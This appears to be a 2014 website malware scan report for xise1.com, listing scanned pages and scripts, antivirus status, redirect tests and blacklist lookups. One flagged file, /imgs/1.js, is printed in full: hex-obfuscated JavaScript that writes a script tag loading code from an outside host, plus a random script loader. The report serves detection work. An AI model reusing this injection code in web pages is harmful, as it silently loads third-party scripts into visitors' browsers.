Scanned pages/files
Request | Server response | Status |
http://www.xise1.com/ | 200 OK Content-Length: 43522 Content-Type: text/html | clean |
http://www.865210.com/head.js | 200 OK Content-Length: 619 Content-Type: application/x-javascript | clean |
http://www.xise1.com/imgs/t.js | 200 OK Content-Length: 2962 Content-Type: application/x-javascript | clean |
http://www.xise1.com/imgs/1.js | 200 OK Content-Length: 556 Content-Type: application/x-javascript | malicious |
Malicious code - confirmed by antiviruses (see below):
window["\x64\x6f\x63\x75\x6d\x65\x6e\x74"]["\x77\x72\x69\x74\x65\x6c\x6e"]("\x3c\x73\x63\x72\x69\x70\x74 \x73\x72\x63\x3d\"\x68\x74\x74\x70\x3a\/\/\x77\x77\x77\x2e\x78\x68\x75\x6e\x69\x6f\x6e\x2e\x63\x6f\x6d\/\x70\x61\x67\x65\/\x3f\x73\x3d\x37\x38\x32\"\x3e\x3c\/\x73\x63\x72\x69\x70\x74\x3e");
r = 2;
var seed = Math.random();
rnd = Math.ceil(seed * r);
switch (rnd) {
  case 1:
    document.write('<script src="/imgs/01.js"></script>');
    break;
  case 2:
    document.write('<script src="/imgs/02.js"></script>');
    break;
}
Antivirus reports:
http://www.xise1.com/imgs/2.js | 200 OK Content-Length: 118 Content-Type: application/x-javascript | clean |
http://s0.yeyequ.com/js/tg.js | 200 OK Content-Length: 1030 Content-Type: application/x-javascript | clean |
http://s5.cnzz.com/stat.php?id=5836980&web_id=5836980 | 200 OK Content-Length: 9618 Content-Type: application/javascript | clean |
http://s5.cnzz.com/stat.php?id=4842903&web_id=4842903 | 200 OK Content-Length: 9621 Content-Type: application/javascript | clean |
http://www.xise1.com/gg.html | HTTP/1.1 200 OK Date: Sat, 19 Apr 2014 05:46:12 GMT Accept-Ranges: bytes ETag: "60ea31c6255bcf1:0" Server: Microsoft-IIS/7.5 Content-Length: 3050 Content-Type: text/html Last-Modified: Fri, 18 Apr 2014 16:46:41 GMT | clean |
http://www.xise1.com/test404page.js | HTTP/1.1 302 Object moved Cache-Control: private Date: Sat, 19 Apr 2014 05:46:15 GMT Location: http://www.xise1.com/test404page.js Server: Microsoft-IIS/7.5 Content-Length: 156 Content-Type: text/html Set-Cookie: ASPSESSIONIDQSDTQRAD=FAHLBHHAIGLBCHPMKKOKFLPI; path=/ | clean |
http://www.xise1.com/tupian/toupai/index.html | 200 OK Content-Length: 27361 Content-Type: text/html | clean |
http://s0.yeyequ.com/js/lba.js | 200 OK Content-Length: 1296 Content-Type: application/x-javascript | clean |
http://www.xise1.com/tupian/yazhou/index.html | 200 OK Content-Length: 28245 Content-Type: text/html | clean |
http://www.xise1.com/tupian/siwa/index.html | 200 OK Content-Length: 27825 Content-Type: text/html | clean |
http://www.xise1.com/tupian/oumei/index.html | 200 OK Content-Length: 23792 Content-Type: text/html | clean |
http://www.xise1.com/tupian/mingxing/index.html | 200 OK Content-Length: 40405 Content-Type: text/html | clean |
http://www.xise1.com/tupian/qingchun/index.html | 200 OK Content-Length: 32853 Content-Type: text/html | clean |
Malicious Redirects
First query (normal visit):
GET / HTTP/1.1
Host: xise1.com
Result:
Second query (visit from search engine):
GET / HTTP/1.1
Host: xise1.com
Referer: http://www.google.com/search?q=xise1.com
Result:
The result is similar to the first query. There are no suspicious redirects found.
Safe Browsing / Blacklists
Query: http://www.google.com/safebrowsing/diagnostic?site=xise1.com
Result: This site is not currently listed as suspicious.
Query: http://yandex.com/infected?l10n=en&url=http://xise1.com/
Result: xise1.com is not infected or malware details are not published yet.